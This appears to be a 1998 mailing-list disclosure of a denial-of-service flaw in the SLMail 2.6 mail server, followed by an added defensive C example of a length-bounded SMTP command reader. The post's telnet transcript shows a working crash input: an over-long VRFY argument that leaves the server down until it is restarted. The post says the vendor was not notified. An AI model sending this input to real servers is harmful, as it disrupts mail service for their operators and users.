SLMail 2.6 DoS

From: Steven (stevenat_private)
Date: Wed Mar 11 1998 - 17:44:56 PST


    Hello,
    
            I have recently found a quite serious DoS attack for the SLMail
    2.6 email daemon (www.seattlelabs.com/slmail). A long string of text
    after a command makes the program crash.  I have only tested this on
    2.6, so I'm not sure if other versions are vulnerable.
    
    craphole:~$ telnet www.victim.com 25
    Trying 555.55.555.55...
    Connected to www.victim.com.
    Escape character is '^]'.
    220 www.victim.com Smtp Server SLMail v2.6 Ready ESMTP spoken here
    vrfy
    dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
    Connection closed by foreign host.
    
    craphole:~$ telnet www.victim.com 25
    Trying 555.55.555.55...
    telnet: Unable to connect to remote host: Connection refused
    craphole:~$
    
            It will stay unresponsive until manually restarted. I haven't
    mailed Seattle Labs about this, but I'm sure they'll figure it out.
    
    Later,
    
    Cisc0 @ Undernet
    stevenat_private
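
An added example, not part of the original post and not SLMail code: a bounded SMTP command-line reader in C that answers an over-long line like the one in the transcript above with a 500 reply and keeps the session alive. The 512-octet limit is the RFC 5321 command-line maximum; the struct and function names are hypothetical, and the post does not say what the actual fault inside SLMail is.

```c
#include <string.h>

#define SMTP_LINE_MAX 512 /* RFC 5321 4.5.3.1.4: command line incl. CRLF */
enum { SMTP_MORE = 0, SMTP_OK = 250, SMTP_TOO_LONG = 500 };

/* Per-connection line accumulator (hypothetical names, not SLMail code). */
struct smtp_conn {
    char   line[SMTP_LINE_MAX + 1];
    size_t used;      /* bytes stored in line[] */
    int    overflow;  /* current line already exceeded the limit */
};

void smtp_conn_init(struct smtp_conn *c) { memset(c, 0, sizeof *c); }

/* Feed one byte. Returns SMTP_MORE until LF, then SMTP_OK (line[] holds the
 * command without CRLF) or SMTP_TOO_LONG (line dropped, session continues). */
int smtp_feed(struct smtp_conn *c, unsigned char byte)
{
    if (byte == '\n') {
        int rc = c->overflow ? SMTP_TOO_LONG : SMTP_OK;
        if (c->used > 0 && c->line[c->used - 1] == '\r')
            c->used--;                    /* strip the CR of CRLF */
        c->line[c->used] = '\0';
        c->used = 0;
        c->overflow = 0;
        return rc;
    }
    if (c->overflow)
        return SMTP_MORE;                 /* discard until end of line */
    if (c->used >= SMTP_LINE_MAX - 1) {   /* LF could no longer fit in 512 */
        c->overflow = 1;
        c->used = 0;
        return SMTP_MORE;
    }
    c->line[c->used++] = (char)byte;
    return SMTP_MORE;
}

/* Feed a buffer; returns the reply for the last completed line, if any. */
int smtp_feed_buf(struct smtp_conn *c, const char *buf, size_t len)
{
    int last = SMTP_MORE;
    for (size_t i = 0; i < len; i++) {
        int rc = smtp_feed(c, (unsigned char)buf[i]);
        if (rc != SMTP_MORE)
            last = rc;
    }
    return last;
}
```

The reader never stores more than the fixed buffer holds, so the length of the argument after `vrfy` has no effect on memory use, and the next command on the same connection is parsed normally.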
    


